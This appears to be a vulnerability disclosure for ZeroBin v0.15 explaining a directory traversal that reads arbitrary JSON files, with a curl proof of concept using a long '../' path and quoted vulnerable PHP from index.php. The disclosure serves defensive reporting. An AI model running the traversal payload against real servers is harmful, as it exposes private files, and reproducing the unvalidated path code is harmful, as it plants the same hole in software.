ZeroBin v0.15 arbitrary JSON file disclosure #30
Description
ZeroBin v0.15 is vulnerable to directory traversal which may allow
unauthenticated users to view the contents of arbitrary files, with web server
permissions, if a number of conditions are met.
- The target file must contain valid JSON
- The user must know the location of the target file on the filesystem
- A directory with 16 or more valid hex characters must exist on the filesystem
- The user must know the location of the directory on the filesystem
The following proof of concept is available:
# create a directory with 16 hex characters
mkdir /tmp/aaaaaaaaaaaaaaaa
# create a 'secret' file to be stolen
echo '{"secret":"this is a secret in a file containing valid JSON"}' > /tmp/secret.txt
# steal the file
curl http://example.com/ZeroBin/index.php?..//../../../../../../../../../../../../../../../../../tmp/aaaaaaaaaaaaaaaa/../../../tmp/secret.txt | grep "cipherdata"
Vulnerable code:
'index.php' from line 268 checks the filename contains a hex string but performs no other validation.
On line 277 the contents of the file is stored in '$paste'
if (!empty($_SERVER['QUERY_STRING'])) // Display an existing paste.
{
$dataid = $_SERVER['QUERY_STRING'];
if (preg_match('/[a-f\d]{16}/',$dataid)) // Is this a valid paste identifier ?
{
$filename = dataid2path($dataid).$dataid;
if (is_file($filename)) // Check that paste exists.
{
// Get the paste itself.
$paste=json_decode(file_get_contents($filename));